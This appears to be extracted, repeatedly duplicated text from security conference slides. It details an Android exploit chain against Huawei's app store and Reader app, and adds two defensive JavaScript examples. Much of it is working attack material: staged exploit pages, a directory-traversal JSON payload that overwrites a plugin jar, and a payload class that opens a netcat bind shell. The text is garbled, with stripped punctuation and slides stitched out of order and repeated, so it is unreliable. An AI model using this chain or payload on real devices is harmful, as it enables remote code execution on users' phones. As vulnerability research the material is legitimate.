CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
• So what do we need to do?
  • Assuming no memory corruption
  • BROWSABLE Intent, URI handler etc.
Browse to Website on Device → Code Exec and Profit
HiApp – Huawei Market Place (App Gallery)
29
HiApp – Whitelist Bypass (CVE-2018-7931)
30
<activity android:configChanges="orientation|screenSize"
    android:launchMode="singleTop"
    android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
    android:theme="@style/loading_activity_style">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:host="details" android:scheme="appmarket" />
        <data android:host="search" android:scheme="market" />
        <data android:host="a.vmall.com" android:scheme="https" />
        <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
    </intent-filter>
HiApp – Whitelist Bypass (CVE-2018-7931)
31
public List b() {
    if(b.a(this.a)) {
        this.a = new ArrayList();
        this.a.clear();
        this.a.add("hicloud.com$");
        this.a.add("vmall.com$");
        this.a.add("huawei.com$");
    }
    Iterator v1 = com.huawei.appmarket.service.whitelist.b.a().iterator();
    do {
        if(v1.hasNext()) {
            if(v1.next().booleanValue()) {
                continue;
            }
HiApp – stage1.html (CVE-2018-7931)
32
document.location = "hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&params={\"params\":[{\"name\":\"uri\",\"type\":\"String\",\"value\":\"internal_webview\"},{\"name\":\"url\",\"type\":\"String\",\"value\":\"http://www.vmall.com:8000/stage2.html\"}]}&channelId=1";
Stage 1: Browse to Website on Device → BROWSABLE Intent – WebView → Code Exec and Profit
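An added example, not code from the slides or from HiApp: the host whitelist on slide 31 rebuilt in JavaScript as suffix regexes (dots are escaped here; the slide does not show whether the app escaped them), beside a stricter check. As rebuilt, it exercises two weaknesses: the match is a bare suffix test over the hostname, so any host whose name ends in the string passes, and nothing ties the match to https, so the stage1 URL above fetches http://www.vmall.com:8000/stage2.html and whoever controls name resolution or the network path supplies the page that lands in the privileged WebView. The function names, the TRUSTED_HOSTS list and the lookalike hostnames are constructed for illustration.

```javascript
"use strict";
// Added example (not the slides' or HiApp's code): weak suffix whitelist vs. strict check.

// Weak check, modelled on slide 31: suffix regexes over the hostname only, any scheme.
const WEAK_WHITELIST = [/hicloud\.com$/, /vmall\.com$/, /huawei\.com$/];

function weakIsWhitelisted(urlString) {
  let host;
  try { host = new URL(urlString).hostname; } catch (_) { return false; }
  return WEAK_WHITELIST.some((re) => re.test(host));
}

// Strict check (assumed hardening): https only, and the host must be exactly a
// trusted host or a real subdomain of one (label boundary enforced by the ".").
const TRUSTED_HOSTS = ["hicloud.com", "vmall.com", "huawei.com"];

function strictIsWhitelisted(urlString) {
  let url;
  try { url = new URL(urlString); } catch (_) { return false; }
  if (url.protocol !== "https:") return false; // plain http: anyone on the path can serve the page
  const host = url.hostname.toLowerCase();
  return TRUSTED_HOSTS.some((t) => host === t || host.endsWith("." + t));
}

// Inputs: the stage-1 URL from this page, plus constructed lookalikes.
const SAMPLE_URLS = [
  "http://www.vmall.com:8000/stage2.html", // from slide 32: trusted host, but plain http
  "https://notvmall.com/stage2.html",      // constructed: suffix match with no label boundary
  "https://www.vmall.com/",                // constructed: what the whitelist was meant to allow
  "javascript:alert(1)",                   // constructed: no host at all
];

// Returns one row per sample with the verdict of each check.
function classify() {
  return SAMPLE_URLS.map((u) => ({
    url: u,
    weak: weakIsWhitelisted(u),
    strict: strictIsWhitelisted(u),
  }));
}

for (const row of classify()) {
  console.log(`${row.url}  weak=${row.weak}  strict=${row.strict}`);
}
```

The strict variant is still only a URL check: an allow-listed origin that is itself compromised, or that hosts attacker-controlled content (user uploads, open redirects), will pass it, so the JavaScript bridge exposed to that WebView still has to be treated as attacker-reachable.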
HiApp – JavaScript Bridge (CVE-2018-7932)
34
this.webview.getSettings().setJavaScriptEnabled(true);
this.webview.requestFocus();
this.webview.setWebViewClient(new InternalWebViewClient(this));
this.webview.setWebChromeClient(new MarketWebChromeClient(this));
this.webview.getSettings().setBlockNetworkImage(true);
this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, ((JsCallBackOjbect)this), this.webview), "HiSpaceObject");
HiApp – JavaScript Bridge (CVE-2018-7932)
35
@JavascriptInterface
public void launchApp(String arg7, String arg8) {
    URISyntaxException v1_1;
    v0_1 = Intent.parseUri(arg8, 0);
    try {
        v0_1.setPackage(arg7);
        this.mActivity.startActivity(v0_1);
android-app URI Schema
36
http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java
android-app://{package_id}[/{scheme}[/{host}[/{path}]]][#Intent;{...};end]
android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end
Action: com.example.MY_ACTION
Package: com.example.app
Extras: some_int=(int)100, some_str=(String)hello
HiApp – stage2.html (CVE-2018-7932)
37
var pkg = "com.huawei.hwireader";
var uri = "android-app://http://www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAIL;S.url=http://192.168.137.1:8000/stage3.html;end";
window.HiSpaceObject.launchApp(pkg, uri);
Stage 2: Browse to Website on Device → BROWSABLE Intent – WebView → Exported Intent – WebView → Code Exec and Profit
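An added example, not code from the slides or from Android: a small parser for the android-app:// and #Intent;…;end syntax that Intent.parseUri() accepts, written to make visible which Intent fields a web page controls once a bridge method such as launchApp(pkg, uri) passes its string through parseUri() and then setPackage(). It handles the fields used on this page plus the S./i./B. extra types; the authority handling follows the grammar quoted from Intent.java on slide 36, which is why the odd stage2 URI yields "http:" as the package id until setPackage() replaces it. The field subset, error handling and function names are this example's own choices.

```javascript
"use strict";
// Added example (not the slides' or Android's code): parse an android-app:// intent URI
// the way a bridge method that calls Intent.parseUri() would expose it to a web page.

// Stage-2 URI as reconstructed on this page (attacker-controlled input).
const STAGE2_URI =
  "android-app://http://www.google.co.uk/#Intent;" +
  "component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;" +
  "action=com.huawei.hwireader.SHOW_DETAIL;" +
  "S.url=http://192.168.137.1:8000/stage3.html;end";

function parseIntentUri(uri) {
  const intent = { package: null, action: null, component: null, data: null, extras: {} };
  const marker = "#Intent;";
  const hashIdx = uri.indexOf(marker);
  const body = hashIdx >= 0 ? uri.slice(0, hashIdx) : uri;
  const fragment = hashIdx >= 0 ? uri.slice(hashIdx + marker.length) : "";

  if (body.startsWith("android-app://")) {
    // android-app://{package_id}[/{scheme}[/{host}[/{path}]]]
    // The authority is taken as the package id, whatever it looks like.
    const rest = body.slice("android-app://".length);
    const slash = rest.indexOf("/");
    intent.package = slash >= 0 ? rest.slice(0, slash) : rest;
    const tail = slash >= 0 ? rest.slice(slash + 1) : "";
    if (tail.length > 0) {
      const parts = tail.split("/");
      const scheme = parts.shift();
      intent.data = parts.length > 0 ? `${scheme}://${parts.join("/")}` : `${scheme}:`;
    }
  } else if (body.length > 0) {
    intent.data = body; // a plain URI ahead of the fragment becomes the data URI
  }

  if (fragment.length === 0) return intent;
  if (!fragment.endsWith("end")) throw new Error("fragment must terminate with ';end'");
  const fields = fragment.slice(0, -"end".length).split(";").filter((f) => f.length > 0);
  for (const field of fields) {
    const eq = field.indexOf("=");
    if (eq < 0) throw new Error(`malformed field: ${field}`);
    const key = field.slice(0, eq);
    const value = decodeURIComponent(field.slice(eq + 1));
    if (key === "action" || key === "package" || key === "component") {
      intent[key] = value;                                  // explicit target selection
    } else if (key.startsWith("S.")) {
      intent.extras[key.slice(2)] = value;                  // String extra
    } else if (key.startsWith("i.")) {
      intent.extras[key.slice(2)] = parseInt(value, 10);    // int extra
    } else if (key.startsWith("B.")) {
      intent.extras[key.slice(2)] = value === "true";       // boolean extra
    } else {
      throw new Error(`unsupported field: ${key}`);
    }
  }
  return intent;
}

// What launchApp() does with the result: setPackage(arg7) replaces whatever
// authority the URI carried, then the intent is started unchanged otherwise.
function resolveLaunchApp(pkg, uri) {
  const intent = parseIntentUri(uri);
  intent.package = pkg;
  return intent;
}

console.log(JSON.stringify(resolveLaunchApp("com.huawei.hwireader", STAGE2_URI), null, 2));
```

The output for the stage2 URI shows the point of CVE-2018-7932: the page picks the exact component in another package and supplies the string extra that ActivityWeb later reads as its URL. A bridge that must start intents on behalf of web content should build the Intent itself from validated fields rather than hand a page-supplied string to parseUri(), or at minimum drop component, package and extras after parsing.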
Huawei Reader Application
39
Huawei Reader – Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8) {
    CharSequence v0_1;
    String v0;
    CharSequence v1 = null;
    super.onCreate(arg8);
    Intent v2 = this.getIntent();
    if(v2 != null) {
        Uri v3 = v2.getData();
        if(v3 != null) {
            v0 = v3.getScheme();
        } else {
            v0_1 = v1;
        }
        v0 = v2.getStringExtra("url");
        if(TextUtils.isEmpty(((CharSequence)v0))) {
            goto label_51;
        }
        this.loadRefreshUrl(v0);
Huawei Reader – Input Validation (CVE-2017-15308)
41
@JavascriptInterface
public void do_command(String arg9) {
    String v4 = ((JSONObject)v2_3).getString("Action");
    LOG.I("js", "actionName:" + v4);
    JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data");
    if(v4.equalsIgnoreCase("onlineReader")) {
        JSProtocol.mJSBookProtocol.online(v5);
        return;
    }
    if(v4.equalsIgnoreCase("readNow")) {
        JSProtocol.mJSBookProtocol.readNow(v5);
        return;
    }
Huawei Reader – Arbitrary Write – Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
    v8 = 0;
    v10 = v4;
    v4_1 = 0;
    try {
        int v13 = v7.getInt("Type");
        v14 = v7.optInt("Version");
        v15 = v7.optBoolean("getDrmAuth", true);
        v3 = PATH.getBookDir() + v7.getString("FileName");
        v2 = v7.getInt("FileId");
        v6 = v7.getString("DownloadUrl");
Huawei Reader – Arbitrary Write – Directory Traversal (CVE-2017-15309)
43
function download_plugin() {
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,"FileName":"../plugins/DFService/classes.jar","FileSize":10000000,"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip","DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Stage 3: Browse to Website on Device → BROWSABLE Intent – WebView → Exported Intent – WebView → File Write → Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10) {
    boolean v0_2;
    try {
        int v3 = arg10.getInt("StartIndex");
        int v4 = arg10.getInt("EndIndex");
        String v2 = arg10.getString("Price");
        int v1 = arg10.getInt("BookId");
        String v5 = arg10.getString("PayURL");
        String v0_1 = arg10.getString("DownloadURL");
        String v7 = PATH.getBookDir() + arg10.getString("FileName");
        if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && Device.getNetType() != 0xFFFFFFFF) {
            FILE.delete(PATH.getBookCachePathNamePostfix(v7));
            FILE.delete(v7);
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2) {
    return PATH.getOpenFailDir() + MD5.getMD5(arg2);
}
public static String getOpenFailDir() {
    return PATH.getWorkDir() + "books/openfail/";
}
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 = ../plugins/DFService/classes.jar
/sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322
/sdcard/HWiReader/books/../plugins/DFService/classes.jar
Huawei Reader – Insecure Plugin Loading
48
public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
    return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
}
protected final ArrayList P() {
    if(pR == null) {
        try {
            PlatForm v3 = new PlatForm();
            Object v2 = Util.loadPlug(APP.getAppContext(), v3.getPlugDir("DFService") + "classes.jar", "com.zhangyue.iReader.PlugService.DocFeature").newInstance();
            v2.setPlatform(((IPlatform)v3));
            pR = ((IPlugDFService)v2);
Huawei Reader – Insecure Plugin Loading
49
function download_plugin() {
    document.writeln("++ Downloading replacement classes.jar ++");
    // It should be noted that FileId needs to be unique for the download to work correctly
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',"FileName":"../plugins/DFService/classes.jar","FileSize":10000000,"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Huawei Reader – Payload Creation
50
package com.zhangyue.iReader.PlugService;

import android.util.Log;
import java.io.IOException;

// Class name must match the one loadPlug() resolves: com.zhangyue.iReader.PlugService.DocFeature.
// newInstance() runs this constructor before the cast to IPlugDFService on slide 48, so the payload executes regardless.
public class DocFeature {
    public DocFeature() {
        Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
        String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Demo
51
Questions
52
Credits
• Georgi Geshev, Rob Miller –
https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/
53
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/)
PUBLIC
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
Vulnerabilities

Building an Exploit Chain
• So what do we need to do?
• Assuming no memory corruption:
  – BROWSABLE Intent, URI handler, etc.

    Browse to Website on Device -> Code Exec and Profit
HiApp – Huawei Market Place (App Gallery)

HiApp – Whitelist Bypass (CVE-2018-7931)

    <activity android:configChanges="orientation|screenSize"
              android:launchMode="singleTop"
              android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
              android:theme="@style/loading_activity_style">
        <intent-filter>
            <action android:name="android.intent.action.VIEW" />
            <category android:name="android.intent.category.DEFAULT" />
            <category android:name="android.intent.category.BROWSABLE" />
            <data android:host="details" android:scheme="appmarket" />
            <data android:host="search" android:scheme="market" />
            <data android:host="a.vmall.com" android:scheme="https" />
            <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
        </intent-filter>
    </activity>
HiApp – Whitelist Bypass (CVE-2018-7931)

    public List b() {
        if (b.a(this.a)) {
            this.a = new ArrayList();
